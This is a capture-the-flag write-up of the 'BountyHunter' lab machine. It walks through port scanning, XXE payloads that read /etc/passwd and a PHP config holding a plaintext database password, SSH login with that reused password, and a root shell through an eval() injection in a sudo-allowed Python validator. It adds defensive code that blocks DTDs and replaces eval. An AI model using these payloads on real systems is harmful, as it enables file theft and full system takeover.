# BOUNTYHUNTER

## Scanning

NMAP

```
➜  ~ nmap -T4 bountyhunter.htb 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-16 07:41 EDT
Nmap scan report for bountyhunter.htb (10.10.11.100)
Host is up (0.23s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 22.44 seconds
```

*A quick scan to find the open ports; from the box name we can already guess this will be a web-based box.*

## Enumeration

**gobuster**

```
gobuster dir -u http://bountyhunter.htb/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php
. . .
/db.php
/resources
. . .
```

port **80**

![](/files/-MjjX9tMgfU5Sg8dYWE7)

Home page.

Click on the portal link ...

![](/files/-MjjX-kc7eGoEltJzNoB)

![](/files/-MjjWxylmaG7ksSwWDZN)

Catch this form's POST request with Burp Suite.

![](/files/-MjjWreGRWCFta5yK4nI)

Let's decode the `data` parameter to understand what's going on.

![](/files/-MjjWo6TeI8fJ3S-r0Li)

It's XML ... let's try XXE injection.

## Exploit

**Payload**

```markup
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> ]>
<bugreport>
    <title>&xxe;</title>
    <cwe>xxxxxxx</cwe>
    <cvss>xxxxxxx</cvss>
    <reward>xxxxxxx</reward>
</bugreport>
```

Base64-encode the payload, then URL-encode it.

![](/files/-MjjWirjTBACKjm_xl5I)

Send the payload.

![](/files/-MjjWbv2FnBtjBVLqI6a)

It works, but wait ... we'll come back to this in a second ...
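The box's PHP backend is not shown in the write-up, so as an added example (not the box's code) here is a Python model of the same three-stage pipeline the request goes through, URL-encoding, then Base64, then XML, with the check a defender would put in front of the parser: any document that declares a DTD (`<!DOCTYPE` / `<!ENTITY`) is refused before it reaches the XML library, which is what stops the external-entity trick above regardless of how the parser itself is configured. The report contents, field names other than the four on the form, and the `check_submission` helper are constructed for the example.

```python
# Added example: a model of the bug-report endpoint's decoding pipeline
# (URL-encoded -> Base64 -> XML) with a DTD check in front of the parser.
# This is not the box's PHP backend, which the write-up never shows.
import base64
import re
import urllib.parse
import xml.etree.ElementTree as ET

EXPECTED_FIELDS = ("title", "cwe", "cvss", "reward")   # the four fields of the form

# Entity declarations can only appear inside a DTD, so refusing <!DOCTYPE and
# <!ENTITY up front removes XXE independently of the parser's own settings.
DTD_MARKER = re.compile(r"<!(?:DOCTYPE|ENTITY)\b", re.IGNORECASE)


def decode_data_param(data_param: str) -> str:
    """Reverse the write-up's encoding order: URL-decode, then Base64-decode."""
    raw = urllib.parse.unquote(data_param)
    return base64.b64decode(raw).decode("utf-8", errors="replace")


def parse_bug_report(xml_text: str) -> dict:
    """Parse a <bugreport> document, rejecting anything that carries a DTD."""
    if DTD_MARKER.search(xml_text):
        raise ValueError("DTD or entity declaration present; report rejected")
    root = ET.fromstring(xml_text)
    if root.tag != "bugreport":
        raise ValueError(f"unexpected root element <{root.tag}>")
    fields = {child.tag: (child.text or "").strip() for child in root}
    missing = [f for f in EXPECTED_FIELDS if f not in fields]
    if missing:
        raise ValueError(f"missing fields: {missing}")
    return fields


def check_submission(data_param: str):
    """Return ('accepted', fields) or ('rejected', reason) for one `data` value."""
    try:
        fields = parse_bug_report(decode_data_param(data_param))
    except (ValueError, ET.ParseError) as exc:   # binascii.Error is a ValueError
        return ("rejected", str(exc))
    return ("accepted", fields)


def encode_for_post(xml_text: str) -> str:
    """Build a `data` value the same way the form does (Base64, then URL-encode)."""
    return urllib.parse.quote(base64.b64encode(xml_text.encode()).decode(), safe="")


# Constructed sample submissions (not captured from the box).
BENIGN_REPORT = """<?xml version="1.0" encoding="ISO-8859-1"?>
<bugreport>
<title>Reflected XSS in search</title>
<cwe>CWE-79</cwe>
<cvss>6.1</cvss>
<reward>500</reward>
</bugreport>"""

# Same shape as the write-up's payload: an external entity pulling a local file.
XXE_REPORT = """<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=db.php"> ]>
<bugreport>
<title>&xxe;</title>
<cwe>x</cwe><cvss>x</cvss><reward>x</reward>
</bugreport>"""


if __name__ == "__main__":
    for name, report in (("benign", BENIGN_REPORT), ("xxe", XXE_REPORT)):
        print(name, "->", check_submission(encode_for_post(report)))
```

The regex check is deliberately placed before `ET.fromstring`: Python's `xml.etree` does not resolve external entities, but PHP's `simplexml_load_string` / `DOMDocument` will when `LIBXML_NOENT` is set, and a pre-parse refusal of any DTD is the control that holds across both. The equivalent for a PHP backend is to never pass `LIBXML_NOENT` and to reject documents containing `<!DOCTYPE` before loading them.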

After directory busting we found this directory:

![](/files/-MjjWZp2dUZJpZzOIsTE)

Open README.txt:

![](/files/-MjjWVqzmiFihEh1d_Yq)

Let's try to grab the db.php file found in the gobuster output.

**Payload**

```markup
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=db.php"> ]>
<bugreport>
    <title>&xxe;</title>
    <cwe>xxxxxxx</cwe>
    <cvss>xxxxxxx</cvss>
    <reward>xxxxxxx</reward>
</bugreport>
```

Base64-encode the payload, then URL-encode it.

![](/files/-MjjWR9CD1WYelUVIwcD)

Send the payload ...

![](/files/-MjjWOqeIIL7-G9qadsx)

```php
<?php
// TODO -> Implement login system with the database.
$dbserver = "localhost";
$dbname = "bounty";
$dbusername = "admin";
$dbpassword = "m19RoAU0hP41A1sTsq6K";
$testuser = "test";
?>
```

Trying to SSH in as the `admin` user with that password does not work ...

Let's try another user.

![](/files/-MjjWKH0mLtP8aGR_dUU)

Burp output when we triggered the `/etc/passwd` read:

The user `development` looks interesting: *a user with UID 1000 is probably the first user ever created on that particular system.*

Try to SSH in as `development` with the password `m19RoAU0hP41A1sTsq6K`.

It works!

![](/files/-MjjWI2_Agfo19mm0Td2)

* [x] USER SHELL ACCESS

## Privilege Escalation

Check sudo rights with `sudo -l`:

![](/files/-MjjW7n-0WyfsP4FhLyY)

We can execute `/opt/skytrain_inc/ticketValidator.py` as root without a password.

Read the script to see what it does: `cat /opt/skytrain_inc/ticketValidator.py`

```python
#Skytrain Inc Ticket Validation System 0.1
#Do not distribute this file.

def load_file(loc):
    if loc.endswith(".md"):
        return open(loc, 'r')
    else:
        print("Wrong file type.")
        exit()

def evaluate(ticketFile):
    #Evaluates a ticket to check for ireggularities.
    code_line = None
    for i,x in enumerate(ticketFile.readlines()):
        if i == 0:
            if not x.startswith("# Skytrain Inc"):
                return False
            continue
        if i == 1:
            if not x.startswith("## Ticket to "):
                return False
            print(f"Destination: {' '.join(x.strip().split(' ')[3:])}")
            continue

        if x.startswith("__Ticket Code:__"):
            code_line = i+1
            continue

        if code_line and i == code_line:
            if not x.startswith("**"):
                return False
            ticketCode = x.replace("**", "").split("+")[0]
            if int(ticketCode) % 7 == 4:
                validationNumber = eval(x.replace("**", ""))
                if validationNumber > 100:
                    return True
                else:
                    return False
    return False

def main():
    fileName = input("Please enter the path to the ticket file.\n")
    ticket = load_file(fileName)
    #DEBUG print(ticket)
    result = evaluate(ticket)
    if (result):
        print("Valid ticket.")
    else:
        print("Invalid ticket.")
    ticket.close

main()
```

We'll build the payload based on these lines of the script:

```python
if loc.endswith(".md"):
if not x.startswith("# Skytrain Inc"):
if not x.startswith("## Ticket to "):
if not x.startswith("**"):
ticketCode = x.replace("**", "").split("+")[0]
if int(ticketCode) % 7 == 4:
    validationNumber = eval(x.replace("**", ""))
    if validationNumber > 100:
        return True
```

**Payload**

File name: root.md

```
# Skytrain Inc
## Ticket to 
__Ticket Code:__
**11+101, __import__('os').system('bash')**
```

![](/files/-MjjW1zFppk50VCnNqeC)

* [x] ROOT SHELL ACCESS

The box creator included the privilege escalation payload in `/tmp/test.md`.
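The root cause is the `eval()` on the `**...**` line, which turns the ticket file into Python source run as root. As an added example (not the box's script), here is a hardened re-implementation of the same accept/reject rules: the ticket code is matched with a strict `**<int>+<int>**` pattern and the sum is computed from the captured integers, so the write-up's `root.md` above is simply rejected instead of executed. The ticket texts are constructed inline for the example; `evaluate_ticket` is the hypothetical replacement for the script's `evaluate`.

```python
# Added example: a hardened replacement for the evaluate() function of
# /opt/skytrain_inc/ticketValidator.py. Same format rules as the original,
# but the ticket code is parsed with a regular expression instead of eval().
import re

# Only "**<digits>+<digits>**" is a ticket code; anything else is invalid input.
TICKET_CODE = re.compile(r"^\*\*(\d+)\+(\d+)\*\*$")


def evaluate_ticket(ticket_text: str) -> bool:
    """Return True for a valid ticket; never evaluates file contents as code."""
    code_line = None
    for i, x in enumerate(ticket_text.splitlines()):
        if i == 0:
            if not x.startswith("# Skytrain Inc"):
                return False
            continue
        if i == 1:
            if not x.startswith("## Ticket to "):
                return False
            continue

        if x.startswith("__Ticket Code:__"):
            code_line = i + 1
            continue

        if code_line and i == code_line:
            m = TICKET_CODE.match(x.strip())
            if not m:
                # The original would eval() this line; here it is just rejected.
                return False
            ticket_code, increment = int(m.group(1)), int(m.group(2))
            if ticket_code % 7 != 4:
                return False
            return ticket_code + increment > 100
    return False


# Constructed tickets (not files from the box).
VALID_TICKET = "# Skytrain Inc\n## Ticket to Venus\n__Ticket Code:__\n**11+101**\n"
LOW_VALUE_TICKET = "# Skytrain Inc\n## Ticket to Venus\n__Ticket Code:__\n**11+10**\n"
WRONG_HEADER_TICKET = "# Other Inc\n## Ticket to Venus\n__Ticket Code:__\n**11+101**\n"
# The write-up's root.md: code after the sum is no longer a ticket code at all.
INJECTED_TICKET = (
    "# Skytrain Inc\n## Ticket to \n__Ticket Code:__\n"
    "**11+101, __import__('os').system('bash')**\n"
)


if __name__ == "__main__":
    for name in ("VALID_TICKET", "LOW_VALUE_TICKET", "WRONG_HEADER_TICKET", "INJECTED_TICKET"):
        print(f"{name}: {'Valid' if evaluate_ticket(globals()[name]) else 'Invalid'} ticket.")
```

Two further points a reviewer of the original would raise: `load_file` only checks the `.md` suffix, not where the file lives, so a root-privileged script reads any user-controlled path; and the `sudo` rule itself is what lets a parsing bug in an unprivileged validator become a root shell, so removing `NOPASSWD` root execution of the script is the fix that holds even if the parser regresses.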

